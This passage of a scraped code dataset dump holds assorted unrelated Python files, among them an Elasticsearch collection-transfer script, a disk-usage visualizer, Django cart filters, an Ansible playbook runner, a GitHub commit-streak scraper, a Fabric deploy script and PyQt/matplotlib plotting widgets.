p_dict[\"batching\"]:\r\n next=p_dict[\"batching\"][\"next\"]\r\n last=p_dict[\"batching\"][\"last\"]\r\n \r\n for inst in p_dict[\"items\"]:\r\n print(i)\r\n #print(inst[\"@id\"])\r\n data2=requests.get(inst[\"@id\"], headers={'accept':'application/json'}, auth=auth_mars)\r\n dict2=json.loads(data2.text)\r\n if \"institution_id\" in dict2:\r\n #print(\"IS_MUSEUM\")\r\n parse_institution( inst[\"@id\"], auth_mars)\r\n i=i+1\r\n if current==last:\r\n go=False\r\n else:\r\n #print(\"GO NEXT\" + next)\r\n data=requests.get(next, headers={'accept':'application/json'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n \r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--es_server\")\r\n parser.add_argument(\"--check_date\", default=check_date_default)\r\n parser.add_argument(\"--user_mars\")\r\n parser.add_argument(\"--password_mars\")\r\n \r\n args = parser.parse_args()\r\n check_date=args.check_date\r\n print(check_date)\r\n print(args.es_server)\r\n es = Elasticsearch(\r\n [args.es_server], \r\n use_ssl = False,\r\n port=9200,\r\n timeout=30\r\n )\r\n #get_collections(root_list_institutions)\r\n auth_mars = HTTPBasicAuth(args.user_mars, args.password_mars)\r\n get_collections(root_list_institutions, auth_mars)\r\n #parse_institution(\"https://collections.naturalsciences.be/cpb/nh-collections/countries/germany/de-zfmk\", auth_mars)","sub_path":"CETAF_DEVELOPMENTS/release_scripts/transfer_mars_collections.py","file_name":"transfer_mars_collections.py","file_ext":"py","file_size_in_byte":14725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"226383239","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 25 16:32:27 2019\n\n@author: Thomas Kastl\n\"\"\"\n\nimport json\nimport gzip\nimport pandas as pd\nfrom collections import namedtuple\nimport os\nimport glob\nimport math\nfrom datetime import datetime\n\nimport plotly.graph_objects as go\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 1)\n return \"%s %s\" % (s, size_name[i])\n\ndef get_most_recent_json_log(path_logs):\n # Get most recent logs folder:\n try:\n path_logs_folder = max(glob.glob(os.path.join(path_logs, '*/')),\n key=os.path.getmtime)\n except ValueError as e:\n raise Exception(\"Error with the path provided: Either not a path or\"+\\\n \"path does not contain subfolders!\") from e\n \n # Grab path to zipped log file and test:\n path_zipped_json = os.path.join(path_logs_folder, \"scan.json\")\n \n if not os.path.isfile(path_zipped_json):\n raise ValueError(\"Most recent folder does not contain logfile. \\n\"+\\\n \"Maybe indexing not finished / crashed?\")\n return path_zipped_json\n\ndef read_json_log_to_dataframe(path_logs, maxlevels=None):\n path_zipped_json = get_most_recent_json_log(path_logs)\n \n with gzip.open(path_zipped_json) as file:\n jsonfile = json.load(file)\n \n # Slightly complicated way to extract the root folder from the indexing \n # algorithm's output. Necessary since dict's aren't indexed.\n headnode = [node for node in jsonfile[\"root\"][\"children\"].values()][0]\n \n # Keeping and updating lists of namedtuple is significantly faster than building\n # the final pandas dataframe during recursion:\n FolderEntry = namedtuple(\"FolderEntry\", [\"parentpath\", \"abspath\", \n \"name\", \"size\", \"count\", \"level\"])\n \n # Recursive function crawls all possible folder paths:\n def getIndices(node, parentpath, parentlevel):\n # Collect info about this folder:\n abspath = parentpath + \"/\" + node[\"name\"]\n level = parentlevel+1\n folder_entry = FolderEntry(parentpath, \n abspath, \n node[\"name\"], \n node[\"size\"],\n node[\"count\"],\n level)\n \n # Recursively collect info about subfolders:\n subfolder_lists = [getIndices(subnode, abspath, level) for subnode in node[\"children\"].values()]\n \n # Each getIndices returns a list. subfolder_entries is therefore a list\n # of lists and needs to be flattened:\n # (See https://stackoverflow.com/a/952952/4629950)\n subfolder_entries = [item for sublist in subfolder_lists for item in sublist]\n \n # Add this folder to subfolder and return the result upwards:\n subfolder_entries.append(folder_entry)\n return subfolder_entries\n \n list_of_entries = getIndices(headnode, \"\", 0)\n df = pd.DataFrame(list_of_entries)\n \n # Filter maximum levels if set to reduce size of output:\n if maxlevels is not None:\n df = df.query(\"level <= {}\".format(maxlevels))\n \n # Get size strings (kB, MB, GB...) for easier reading:\n df[\"size_string\"] = df[\"size\"].apply(convert_size)\n \n # Read scan time for additional feedback:\n scan_time = datetime.utcfromtimestamp(jsonfile[\"scan_time\"]).strftime('%Y-%m-%d %H:%M:%S')\n \n return(df, scan_time)\n\n\ndef visualize_folder_scan(save_directory, maxlevels=5, showlevels=3, agg_type=\"size\"):\n df_data, scan_time = read_json_log_to_dataframe(save_directory, maxlevels=maxlevels)\n \n # Reconstruct scan path from df:\n top_level_path = df_data.query(\"parentpath==''\")[\"abspath\"].iloc[0]\n \n # Collect arguments to figure constructor:\n fig_args = {\n \"ids\": df_data.abspath,\n \"labels\": df_data.name,\n \"parents\": df_data.parentpath,\n \"values\": df_data[\"size\"],\n \"hovertext\": df_data.name,\n \"hoverinfo\": \"text\",\n \"domain\": dict(column=0),\n \"branchvalues\": \"total\",\n \"textinfo\": \"none\",\n \"customdata\": df_data[\"size_string\"],\n \"hovertemplate\": \"%{label}: %{customdata} %{id}\",\n \"name\": \"filesize_chart\",\n \"maxdepth\": showlevels+1 # Increase by 1 because first \"level\" is just the top level folder.\n }\n \n # Switch visualization to file count per folder if requested:\n if agg_type==\"count\":\n fig_args[\"values\"]=df_data[\"count\"]\n fig_args[\"hovertemplate\"]= \"%{label}: %{value} Files %{id}\"\n fig_args[\"customdata\"]= None\n \n # Create and show figure:\n fig = go.Figure()\n fig.add_trace(go.Sunburst(**fig_args))\n fig.update_layout(margin = dict(t=40, l=0, r=0, b=0),\n width=800, height=600,\n title = {\"text\": \"Disk usage visualization of {} @ {}\".format(top_level_path,\n scan_time)})\n fig.show()","sub_path":"dv/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79322804","text":"from copy import deepcopy as copy\nclass Solution:\n def imageSmoother(self, M):\n \"\"\"\n :type M: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n row = len(M)\n col = len(M[0]) if row else 0\n ret = copy(M)\n for i in range(row):\n for j in range(col):\n nei = [\n M[a][b]\n for a in (i-1, i, i+1)\n for b in (j-1, j, j+1)\n if 0 <= a < row and 0 <= b < col\n ]\n ret[i][j] = sum(nei) // len(nei)\n return ret\n\n'''\nan unsatisfied ans\n'''\n","sub_path":"algorithms/python/661.Image Smoother.py","file_name":"661.Image Smoother.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"366733227","text":"from django import template\nfrom decimal import Decimal\n\n\n\nregister = template.Library()\n\n\n@register.filter(name='offer_price_start')\ndef offer_price_start(queryset):\n return queryset.first().price\n\n\n@register.filter(name=\"cart_quantity\")\ndef cart_quantity(package_id, cart):\n keys = cart.keys()\n for id in keys:\n if int(id) == package_id.id:\n return cart.get(id)\n return 0\n\n\n@register.filter(name='cart_total')\ndef cart_total(package_id, cart):\n if package_id.price:\n return package_id.price * cart_quantity(package_id, cart)\n else:\n pass\n\n\n#subtotal\n@register.filter(name='get_subtotal_cart_total')\ndef get_subtotal_cart_total(package_id, cart):\n\tsubtotal = 0\n\tfor p in package_id:\n\t\tsubtotal += cart_total(p, cart)\n\treturn subtotal\n\n\n\n\n@register.filter(name=\"total_with_service_fee\")\ndef get_total_with_service_fee(package_id, cart):\n total = 0\n service_fee = 0.25\n for p in package_id:\n total += cart_total(p, cart) + Decimal(service_fee)\n return total","sub_path":"mainApp/templatetags/custom_filter.py","file_name":"custom_filter.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"372650687","text":"import zipfile\nimport pandas as pd\nimport tqdm\nimport json\n\n\ndef unzip(filepath, out_dir):\n with zipfile.ZipFile(filepath, 'r') as zip_ref:\n zip_ref.extractall(out_dir)\n\n\ndef glimpse(path):\n df = pd.read_csv(path, nrows=5)\n display(df.head(), pd.DataFrame(list(df.columns), columns=['columns']))\n\n\ndef event_data_to_json(input_file, output_file, chunksize=1000000):\n with open(output_file, 'w') as f:\n for item in tqdm.tqdm_notebook(pd.read_csv(input_file, chunksize=chunksize, usecols=['event_data'])):\n for line in item['event_data']:\n f.write(line)\n f.write('\\n')\n\n\ndef get_event_data_keys(json_data):\n for k, v in json_data.items():\n if isinstance(v, dict):\n for kk in get_event_data_keys(v):\n yield '{}.{}'.format(k, kk)\n else:\n yield k\n\n\ndef make_json_keys_set(path, result_set, chunksize=500000):\n chunks = pd.read_csv(path, usecols=['event_data'], converters={'event_data': json.loads}, chunksize=chunksize)\n for chunk in tqdm.tqdm_notebook(chunks):\n series_of_chunk_cols = map(lambda x: set(get_event_data_keys(x)), chunk['event_data'].values)\n chunk_cols = set.union(*list(series_of_chunk_cols))\n result_set = set.union(result_set, chunk_cols)\n return result_set\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"334752657","text":"import unittest\nfrom openpatch_format.api.v1.formats.fill_in import FillIn\nfrom tests.api.v1.formats import TestFormat\n\n\nclass TestFillIn(TestFormat, unittest.TestCase):\n Format = FillIn\n\n def test_validate_regex(self):\n task = {\n \"format_type\": \"fill-in\",\n \"data\": {\"text\": {}},\n \"evaluation\": {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]},\n }\n\n result = self.Format.validate(task)\n self.assertTrue(result[\"correct\"])\n\n def test_validate_malformed_regex(self):\n task = {\n \"format_type\": \"fill-in\",\n \"data\": {\"text\": {}},\n \"evaluation\": {\"inputs\": [{\"regex\": \"d+(\"}, {\"regex\": \"e+\"}]},\n }\n\n result = self.Format.validate(task)\n self.assertFalse(result[\"correct\"])\n\n def test_evaluate_correct(self):\n evaluation = {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]}\n\n solution = {\"values\": {\"0\": \"ddd\", \"1\": \"eee\"}}\n\n result = self.Format.evaluate(evaluation, solution, None)\n self.assertTrue(result[\"correct\"])\n\n def test_evaluate_incorrect(self):\n evaluation = {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]}\n\n solution = {\"values\": {\"0\": \"ddd\", \"1\": \"ccc\"}}\n\n result = self.Format.evaluate(evaluation, solution, None)\n self.assertFalse(result[\"correct\"])\n\n def test_evaluate_no_solution(self):\n evaluation = {\"inputs\": [{\"regex\": \"d+\"}, {\"regex\": \"e+\"}]}\n\n result = self.Format.evaluate(evaluation, None, None)\n self.assertFalse(result[\"correct\"])\n","sub_path":"tests/api/v1/formats/test_fill_in.py","file_name":"test_fill_in.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"440323335","text":"# _*_ coding:utf-8 _*_\n\n# モジュールのインポート\nfrom bottle import route,run,template\n\n\n\n\n# ヘッダの取得\n@route('/show_header')\ndef show_header():\n #ヘッダ情報の表示\n header_list = [\"

    %s = %s

    \" % (k,v) for k,v in request.headers.items()]\n return \"\".join(header_list)\n\n# ヘッダの取得\n@route('/show_cookie')\ndef show_cookie():\n #cookieの表示\n count = request.cookies.get('count')\n return template('count={{count}}',count=count)\n\n\n\n# ビルトインの開発用サーバの起動\nif __name__=='__main__':\n run(host='localhost',port=8080,debug=True,reloader=True)\n","sub_path":"HTTPmethod.py","file_name":"HTTPmethod.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"172145650","text":"# pdb is inbuilt python debugger\n\na = input()\nb = input()\n\nbreakpoint()\n\ndef sum_the_values(a,b):\n print(\"we are inside this function\")\n print(int(a)+int(b))\n\n\nsum_the_values(a,b)\n\n# pdb console appears whenever it sees a breakpoint().\n# c(continue) => continue all the leftover code after breakpoint.\n# n(next) => runs the very next piece of code.\n# s(step inside) => to step inside a function such that enter will work like showing us next line executing instead\n# of normal donothing behaviour\n# we can use print to know values of the variables at a stage in pdb\n# we can also know the datatype by using \"whatis\"","sub_path":"Python Advance/W07D02/pdb_working.py","file_name":"pdb_working.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"489835546","text":"# command line example:\n\nimport sys\n\n\nfrom setup_utils import parse_command_line, configure_python_paths\nfrom os.path import join\n\n# -------------------------------processing command line\nif len(sys.argv)>2:\n\n args = parse_command_line()\n\n\nelse: # emulate command line\n command_line_emulation_argument_list = ['--subject','R1075J',\n '--experiment','PS2',\n '--workspace-dir','/Users/m/scratch/auto_tracker',\n '--mount-point','/Users/m',\n '--python-path','/Users/m/RAM_UTILS_GIT',\n '--python-path','/Users/m/PTSA_NEW_GIT']\n\n args = parse_command_line(command_line_emulation_argument_list)\n\nconfigure_python_paths(args.python_path)\n\n# ------------------------------- end of processing command line\n\n\nimport numpy as np\n\nfrom ReportUtils import ReportPipeline\n# from RamPipeline import RamPipeline\n#\n# from RamPipeline.DependencyChangeTrackerLegacy import DependencyChangeTrackerLegacy\n\nfrom FREventPreparation import FREventPreparation\nfrom JSONStubPreparation import JSONStubPreparation\n\n\n# turn it into command line options\n\nclass Params(object):\n def __init__(self):\n self.width = 5\n\n self.fr1_start_time = 0.0\n self.fr1_end_time = 1.366\n self.fr1_buf = 1.365\n\n self.control_start_time = -1.1\n self.control_end_time = -0.1\n self.control_buf = 1.0\n\n self.ps_start_time = -1.0\n self.ps_end_time = 0.0\n self.ps_buf = 1.0\n self.ps_offset = 0.1\n\n self.filt_order = 4\n\n self.freqs = np.logspace(np.log10(3), np.log10(180), 8)\n\n self.log_powers = True\n\n self.penalty_type = 'l2'\n self.C = 7.2e-4\n\n self.n_perm = 200\n\n self.include_fr1 = True\n self.include_catfr1 = True\n\n\nparams = Params()\n\n\n# class ReportPipeline(RamPipeline):\n# def __init__(self, subject, experiment, workspace_dir, mount_point=None):\n# RamPipeline.__init__(self)\n# self.subject = subject\n# #self.task = 'RAM_FR1'\n# self.experiment = experiment\n# self.mount_point = mount_point\n# self.set_workspace_dir(workspace_dir)\n# dependency_tracker = DependencyChangeTrackerLegacy(subject=subject, workspace_dir=workspace_dir, mount_point=mount_point)\n#\n# self.set_dependency_tracker(dependency_tracker=dependency_tracker)\n\n\n\n# sets up processing pipeline\nreport_pipeline = ReportPipeline(subject=args.subject, experiment=args.experiment,\n workspace_dir=join(args.workspace_dir,args.subject), mount_point=args.mount_point)\n\n\n\n\nreport_pipeline.add_task(JSONStubPreparation(params=params, mark_as_completed=True))\nreport_pipeline.add_task(FREventPreparation(params=params, mark_as_completed=True))\n\n# starts processing pipeline\nreport_pipeline.execute_pipeline()\n","sub_path":"tests/auto_tracker/auto_tracker.py","file_name":"auto_tracker.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609461590","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Filename: ndrobot\n# @Date: 2019-06-25-09-09\n# @Author: Hany Abdulsamad\n# @Contact: hany@robot-learning.de\n\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport autograd.numpy as np\n\n\nclass Car(gym.Env):\n\n def __init__(self):\n self.nb_xdim = 4\n self.nb_bdim = 4\n self.nb_udim = 2\n self.nb_zdim = 2\n\n self._dt = 0.5\n self._g = np.array([0., 0., 0., 0.])\n\n # car length\n self._l = 0.1\n\n # belief cost weights\n self._bw = np.array([1., 1., 1., 1.])\n self._vw = np.array([1., 1., 1., 1.])\n # action cost weights\n self._uw = np.array([1., 1.])\n\n self._xmax = np.array([np.inf, np.inf, np.inf, np.inf])\n self._zmax = np.array([np.inf, np.inf, np.inf, np.inf])\n self._umax = np.array([np.inf, np.inf])\n\n self._state_space = spaces.Box(low=-self._xmax,\n high=self._xmax)\n\n self.action_space = spaces.Box(low=-self._umax,\n high=self._umax)\n\n self.observation_space = spaces.Box(low=-self._xmax,\n high=self._xmax)\n\n self.seed()\n self.reset()\n\n @property\n def state_space(self):\n return self._state_space\n\n @property\n def xlim(self):\n return self._xmax\n\n @property\n def ulim(self):\n return self._umax\n\n @property\n def dt(self):\n return self._dt\n\n @property\n def goal(self):\n return self._g\n\n def init(self):\n # initial belief\n _b0 = np.array([2., 2., 0., 0.])\n _sigma_b0 = 1. * np.eye(self.nb_bdim)\n return _b0, _sigma_b0\n\n def dynamics(self, x, u):\n # x, y, th, v\n xn = x + self._dt * np.array([x[3] * np.cos(x[2]),\n x[3] * np.sin(x[2]),\n x[3] * np.tan(u[1]) / self._l,\n u[0]])\n return xn\n\n def dyn_noise(self, x=None, u=None):\n return 1.e-4 * np.eye(self.nb_xdim)\n\n def observe(self, x):\n return np.array([x[0], x[1]])\n\n def obs_noise(self, x=None):\n _sigma = 1.e-4 * np.eye(self.nb_zdim)\n _sigma += np.array([[0.5 * (5. - x[0])**2, 0.],\n [0., 0.]])\n return _sigma\n\n # cost defined over belief\n def cost(self, mu_b, sigma_b, u, a):\n if a:\n return (mu_b - self._g).T @ np.diag(100. * self._bw) @ (mu_b - self._g) +\\\n np.trace(np.diag(100. * self._vw) @ sigma_b)\n else:\n return u.T @ np.diag(self._uw) @ u + np.trace(np.diag(self._vw) @ sigma_b)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def step(self, u):\n # state-action dependent dynamics noise\n _sigma_dyn = self.dyn_noise(self.state, u)\n # evolve deterministic dynamics\n self.state = self.dynamics(self.state, u)\n # add dynamics noise\n self.state = self.np_random.multivariate_normal(mean=self.state, cov=_sigma_dyn)\n\n # state-action dependent dynamics noise\n _sigma_obs = self.obs_noise(self.state)\n # observe state\n _z = self.observe(self.state)\n # add observation noise\n _z = self.np_random.multivariate_normal(mean=_z, cov=_sigma_obs)\n return _z, [], False, {}\n\n def reset(self):\n self.state = np.array([0., 4., 0., 0.])\n return self.observe(self.state)\n","sub_path":"trajopt/envs/car/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"528561852","text":"#Program to illustrate writelines() method\r\n#for writing list into the file\r\n\r\nf =open(\"test4.txt\",'w')\r\nlist =[\"Computer Science\\n\",\"Physics\\n\",\"Chemistry\\n\",\"Maths\"]\r\nf.writelines(list)\r\nprint(\"List of lines written to the file successfully\")\r\nf.close()\r\n\r\n\r\n","sub_path":"prog_file10.py","file_name":"prog_file10.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"275046565","text":"# coding=utf-8\nimport json\n\nfrom ansible.executor.playbook_executor import PlaybookExecutor\nfrom ansible.inventory.manager import InventoryManager\nfrom ansible.parsing.dataloader import DataLoader\nfrom ansible.plugins.callback import CallbackBase\nfrom ansible.vars.manager import VariableManager\nfrom collections import namedtuple\nfrom ansible.executor.task_queue_manager import TaskQueueManager\nfrom collections import OrderedDict\nfrom src.script.options import options\n\n\n# noinspection PyProtectedMember\nclass PlaybookCallback(CallbackBase):\n\n def __init__(self):\n super(PlaybookCallback, self).__init__()\n self.host_ok = {}\n self.host_unreachable = {}\n self.host_failed = {}\n\n def playbook_on_start(self):\n # 首先执行\n pass\n\n def playbook_on_stats(self, stats):\n # 结束时调用,无论成功或者失败\n print('stats', type(stats))\n\n def v2_runner_on_failed(self, result, ignore_errors=False):\n # 异步执行失败也调用这里\n name = result._host.get_name()\n if name not in self.host_failed:\n self.host_failed[name] = OrderedDict()\n self.host_failed[name][result.task_name] = result._result\n\n def v2_runner_on_ok(self, result):\n \"\"\"\n result: TaskResult\n _host:\n _task: Task\n _result: dict\n _task_field\n task_name: Unicode\n 1. 任务超时后不会继续往下执行,并且结果中不存在rc, 任务执行成功rc为0,超时针对的时当前步骤\n 2. name只会显示步骤名称不会显示include名称\n 3. 多台主机只要有一台中间执行失败就会都执行失败\n \"\"\"\n name = result._host.get_name()\n if name not in self.host_ok:\n self.host_ok[name] = OrderedDict()\n self.host_ok[name][result.task_name] = result._result\n\n def v2_runner_on_unreachable(self, result):\n\n name = result._host.get_name()\n if name not in self.host_unreachable:\n self.host_unreachable[name] = OrderedDict()\n self.host_unreachable[name][result.task_name] = result._result\n\n\n# noinspection PyProtectedMember\ndef main():\n loader = DataLoader()\n # sources 为hosts文件数组\n inv = InventoryManager(loader=loader, sources=['../../ansible_etc/hosts'])\n varivaleManager = VariableManager(loader=loader, inventory=inv)\n # playbooks, inventory, variable_manager, loader, options, passwords\n playbook = PlaybookExecutor(playbooks=['../../ansible_etc/test.yml'], inventory=inv,\n variable_manager=varivaleManager, loader=loader, options=options, passwords=dict())\n callback = PlaybookCallback()\n playbook._tqm._stdout_callback = callback\n playbook.run()\n print(callback.host_ok)\n print(json.dumps(callback.host_ok, indent=2))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/script/playbool_executor.py","file_name":"playbool_executor.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"270393873","text":"import asyncio\nimport time\nimport timeit\nfrom datetime import timedelta, datetime\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\n\nfrom chunkator import chunkator\n\nfrom apps.githubs.models import GithubUser\nfrom utils.slack import slack_update_1day_1commit\n\n\nasync def check_1day_1commit(github_user: GithubUser):\n \"\"\"\n 1일 1커밋 크롤링으로 업데이트\n \"\"\"\n async with aiohttp.ClientSession() as session:\n async with session.get(f'https://github.com/{github_user.username}') as res:\n source = await res.text()\n soup = BeautifulSoup(source, \"lxml\") # html.parse 보다 lxml이 더 빠르다고 한다\n count = 0\n\n now = datetime.now() - timedelta(days=1)\n for rect in reversed(soup.select('rect')):\n # 업데이트 당일 전날부터 체크\n if not rect.get('data-date') or \\\n now.date() < datetime.strptime(rect.get('data-date'), '%Y-%m-%d').date():\n continue\n\n if not rect.get('data-count') or rect.get('data-count') == '0':\n break\n\n count += 1\n\n #print(f'{github_user.username}: {count}')\n github_user.continuous_commit_day = count\n github_user.save(update_fields=['continuous_commit_day'])\n time.sleep(0.1) # 429 에러 때문에 약간의 sleep 을 준다.\n\n\ndef update_1day_1commit(github_user_id: int = None):\n async def update_1day_1commit_futures(user_id: int = None):\n github_users = GithubUser.objects.filter(id=user_id) if user_id else GithubUser.objects.all()\n\n if not github_users:\n return\n\n futures = [\n asyncio.ensure_future(check_1day_1commit(github_user)) for github_user in chunkator(github_users, 1000)\n ]\n\n await asyncio.gather(*futures)\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(update_1day_1commit_futures(github_user_id))\n\n\ndef run():\n start_time = timeit.default_timer() # 시작 시간 체크\n slack_update_1day_1commit(status='시작🌱', message='')\n\n update_1day_1commit()\n\n terminate_time = timeit.default_timer() # 종료 시간 체크\n slack_update_1day_1commit(\n status='완료🌿',\n message=f'1일 1커밋 카운트 업데이트가 {terminate_time - start_time:.2f}초 걸렸습니다.😎',\n )\n","sub_path":"opgc/scripts/update_1day_1commit.py","file_name":"update_1day_1commit.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456436602","text":"from fabric.api import *\nfrom fabric.contrib import files\n\nenv.use_ssh_config = True\n\ndef setup_nanomsg():\n RELEASE = 'nanomsg-0.4-beta'\n TARBALL = '%s.tar.gz' % RELEASE\n if not files.exists(TARBALL):\n run('wget http://download.nanomsg.org/%s' % TARBALL)\n run('tar xf %s' % TARBALL)\n with cd(RELEASE):\n run('./configure')\n run('make')\n sudo('make install')\n sudo('ldconfig')\n\n\ndef setup_nanomsg_python():\n REPO_NAME = 'nanomsg-python'\n HASH = '742d39a520230da373552fd0f1858feefc623b15'\n REPO_URL = 'https://github.com/tonysimpson/nanomsg-python.git'\n if not files.exists(REPO_NAME):\n run('git clone %s' % REPO_URL)\n with cd(REPO_NAME):\n run('git checkout %s' % HASH)\n sudo('python setup.py install')\n\n\ndef setup():\n setup_nanomsg()\n setup_nanomsg_python()\n sudo('pip install chan')\n\n\ndef deploy():\n run('hostname')\n sudo('/etc/init.d/traffic stop', pty=False)\n put('traffic.py')\n put('lights.py')\n put('run.sh')\n put('init-%s' % env.host_string, '/etc/init.d/traffic', use_sudo=True)\n sudo('chown root:root /etc/init.d/traffic')\n sudo('update-rc.d traffic defaults')\n sudo('chmod 755 /etc/init.d/traffic')\n sudo('/etc/init.d/traffic start', pty=False)\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"632999032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2 f�vr. 2015\n@author: Odile\n\ngui.plots\n\"\"\"\nfrom PyQt4 import QtGui\nfrom matplotlib.backends.backend_qt4 import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as Canvas\nfrom matplotlib.figure import Figure\n\nfrom gui.plots_qt import Ui_TabWidget_Plots\n\nimport numpy as np\n\n\nclass PlotsGUI(QtGui.QTabWidget):\n\n \"\"\"\n classdocs\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Constructor\n \"\"\"\n super(PlotsGUI, self).__init__(parent)\n self.ui = Ui_TabWidget_Plots()\n self.ui.setupUi(self)\n\n def setup(self, analysis):\n self.ana = analysis\n self.__connect_events()\n self.__setup_plots()\n\n def __setup_plots(self):\n # Signal\n self.mpl_sig = MatplotlibWidget(\n title='Signal', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_sig.setObjectName(\"matplotlibwidget_Signal\")\n self.ui.verticalLayout.addWidget(self.mpl_sig)\n navigation = NavigationToolbar(self.mpl_sig, self)\n self.ui.verticalLayout.addWidget(navigation)\n # Frequency spectrum\n self.mpl_spec = MatplotlibWidget(\n title='Spectrum', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_spec.setObjectName(\"matplotlibwidget_Spectrum\")\n self.ui.verticalLayout_2.addWidget(self.mpl_spec)\n navigation = NavigationToolbar(self.mpl_spec, self)\n self.ui.verticalLayout_2.addWidget(navigation)\n # Mass spectrum\n self.mpl_mass = MatplotlibWidget(\n title='Mass', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_mass.setObjectName(\"matplotlibwidget_Mass\")\n self.ui.verticalLayout_3.addWidget(self.mpl_mass)\n navigation = NavigationToolbar(self.mpl_mass, self)\n self.ui.verticalLayout_3.addWidget(navigation)\n # Mass spectrum\n self.mpl_peaks = MatplotlibWidget(\n title='Peaks', xlabel='n/a', ylabel='n/a', dpi=70)\n self.mpl_peaks.setObjectName(\"matplotlibwidget_Peaks\")\n self.ui.verticalLayout_4.addWidget(self.mpl_peaks)\n navigation = NavigationToolbar(self.mpl_peaks, self)\n self.ui.verticalLayout_4.addWidget(navigation)\n # default tab = signal\n self.setCurrentIndex(0)\n\n def __connect_events(self):\n self.ana.plotSigRaisedSignal.connect(self.update_signal)\n self.ana.plotSpecRaisedSignal.connect(self.update_spectrum)\n self.ana.plotMassRaisedSignal.connect(self.update_mass)\n self.ana.plotPeaksRaisedSignal.connect(self.update_peaks)\n\n def update_signal(self, shortname, y, step, start, end):\n title = shortname + \" - signal - \" + \\\n \"(\" + str(start) + \", \" + str(end) + \")\"\n x = np.arange(len(y)) * step * 1e3 # in ms\n self.mpl_sig.plot_data(x, y, title, \"time (ms)\", \"a.u.\")\n\n def update_spectrum(self, shortname, y, freq):\n title = shortname + \" - frequency spectrum\"\n x = freq / 1e3 # in kHz\n self.mpl_spec.plot_data(x, y, title, \"Freq. (kHz)\", \"a.u.\")\n\n def update_mass(self, shortname, y, mass, ref, cyclo, mag, hold):\n title = shortname + \" - mass spectrum - \" + \\\n \"(\" + str(ref) + \", \" + str(cyclo) + \", \" + str(mag) + \")\"\n x = mass\n self.mpl_mass.plot_mass(x, y, title, \"Mass (u)\", \"a.u.\", hold)\n\n def update_peaks(self, shortname, y, mass, ind, mph, mpd, x1, x2, hold):\n title = shortname + \" - mass spectrum - \" + \\\n \"(mph=\" + str(mph) + \", mpd=\" + str(mpd) + \")\"\n x = mass\n self.mpl_peaks.plot_peaks(\n x, y, ind, title, \"Mass (u)\", \"a.u.\", x1, x2, hold)\n\n\nclass MatplotlibWidget(Canvas):\n\n def __init__(self, parent=None, title='Title', xlabel='x label', ylabel='y label', dpi=100):\n super(MatplotlibWidget, self).__init__(Figure())\n\n self.setParent(parent)\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n self.ax = self.figure.add_subplot(111)\n self.ax.hold(False)\n\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n\n def plot_data(self, x, y, title, xlabel, ylabel):\n self.ax.plot(x, y)\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n self.draw()\n\n def 